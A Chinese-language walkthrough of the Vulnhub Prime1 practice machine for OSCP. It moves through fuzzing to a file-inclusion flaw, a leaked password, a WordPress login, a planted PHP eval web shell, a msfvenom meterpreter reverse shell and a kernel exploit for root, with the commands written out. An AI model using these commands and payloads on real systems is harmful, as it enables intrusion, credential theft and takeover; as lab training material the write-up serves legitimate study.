当前位置: 代码迷 >> 综合 >> Vulnhub Prime1
  详细解决方案

Vulnhub Prime1

热度:1   发布时间:2023-12-05 18:46:23.0

明确:《中华人民共和国网络安全法

Description

This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam.

This is first level of prime series. Some help at every stage is given. Machine is lengthy as OSCP and Hackthebox's machines are designed.

So you have a target to get root flag as well as user flag. If stuck on a point some help are given at a level of enumeration.

ubuntu 靶机,回去扫网段 

<html>
<title>HacknPentest</title>
<body><img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body></html>

/dev 

/index.php

/index.php/login/

/wordpress/wp-login.php 

/wordpress/ 

/dev  

hello,now you are at level 0 stage.In real life pentesting we should use our tools to dig on a web very hard.Happy hacking. 

/index.php

/index.php/login/ 

/wordpress/wp-login.php 

/wordpress/ 

droopescan 扫不了登录页面,可能被防了

wpscan 也扫不出用户名,ssh 爆破 admin 也被限制,回头看看,第 0 阶段,需要挖更多的东西,只能是目录扫描没有扫出来的文件了

dirb -X 扫 /dev 下的敏感文件

dirb http://192.168.37.133 -X .php,.txt,.py,.zip  

除了原扫出的 index,php 和 image.php 多扫出来了一个 secret,从内容看是我们要找的东西

Looks like you have got some secrets.Ok I just want to do some help to you. Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web//see the location.txt and you will get your next move//

从话中我们知道使用 fuzz 模糊测试在某个页面找漏洞参数,burp suite 或者 wfuzz,话中链接就是 wfuzz 的使用,最后提示看 location.txt ,但是每个页面都找不到,应该是接下来 wfuzz 使用的参数内容,就像 DC-9 中我们使用 wfuzz 的流程一样

先找 php 页面,除去登录页面和图片页面,只剩下 /index.php,开始找参数

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.133/index.php?FUZZ

响应  响应行xL  响应单词数xW  响应字符xCh
加入 --hl (隐藏具有相同的 50 行数的响应)
同样有 --hc/hw

wfuzz --hw 12 -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.133/index.php?FUZZ

 得到正确参数 file,文件包含漏洞,参数内容应该就是找不到的 location.txt

http://192.168.37.133/index.php?file=location.txt

Do something better

ok well Now you reah at the exact parameter

Now dig some more for next one
use 'secrettier360' parameter on some other php page for more fun.

在前面我们一共有两个 php 网页

index.php

image.php

使用参数 secrettier360 测两个网页

http://192.168.37.133/image.php?secrettier360

利用正确参数,使用文件包含漏洞先看 /etc/passwd 

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin

可以看到 saket 的第五个域身份描述中有内容

saket:x:1001:1001:find password.txt file in my directory:/home/saket:

到其目录下拿 password.txt

?secrettier360=/home/saket/password.txt

follow_the_ippsec

这里我想直接 ssh,但是失败,被检测到了,不允许登录

有账号有秘密回去找那个登录框

错误,有问题,再试个 admin,也不行,账号可能有问题

wpscan --url http://192.168.37.133/wordpress/wp-login.php -e u   

wpscan --url http://192.168.37.133/wordpress -e u   

用 wpscan 重扫,扫出之前漏掉的用户,victor

/wordpress/ 中也可以看到唯一发表过的作者也是 victor

登录成功,直接先找可写入木马的地方,找到两个编辑器

 ??????主题编辑器(Theme Editor)

插件编辑器(Plugin Editor)

查看各个文件后发现只有 secret.php 左下角有 upload file,且有提示我们找到可写入文件

 /* Ohh Finaly you got a writable file */

写入反弹命令后我们需要找到对应的 secret.php 执行,在右边可以看到有三个编辑主题

在我的 wordpress 中文件路径可以找到对应的主题路径

所以 secret.php 的路径应该是

/wordpress/wp-content/themes/twentynineteen/secret.php

注意这里的 Twenty Nineteen 对应的文件夹名应该是 twentynineteen

执行后发现这个反弹语句不行,使用一句话木马可以直接连上

<?php @eval($_REQUEST['Sherlock']); ?>

因为连蚁剑后不好操作,还是虚拟机好用,反弹也可以尽量避免 IP 的变动或者杀毒

用 msf 生成可利用反弹语句

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.37.128 lport=3333 -o shell.php

lhost 和 lport 为监听端

生成的反弹语句得用配套的 msf 监听,nc 不能监听 

use exploit/multi/handler                                                                 使用侦听模块

set payload php/meterpreter/reverse_tcp                                       使用 payload

show options

set lhost 192.168.37.128                                                                 设置侦听端

set lport 3333

run

 

执行文件,监听成功

pwd                    当前目录

sysinfo                系统信息

getuid                 当前权限

Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64

Ubuntu 内核版本                Ubuntu 发行版本

Ubuntu 版本号,老版本查漏洞

一共两个本地提权脚本

由于是 c 语言文件,要使用先编译

 

使用 upload 将文件传入,当然这里也可以用 http 传入(图二),但是要提取赋权靶机才能下载

chmod 777 45010

chmod a=rwx file 和 chmod 777 file 等价

a        所有人

r         4

w        2

x         1

 进入终端,进入 /tmp 目录,执行脚本 ./Prime_1_45010

 

如果使用 upload 上传后会发现脚本权限不够,跟 DC-8 一样,这里可以直接在靶机上赋权

 继续执行可执行文件后无报错

得到 root flag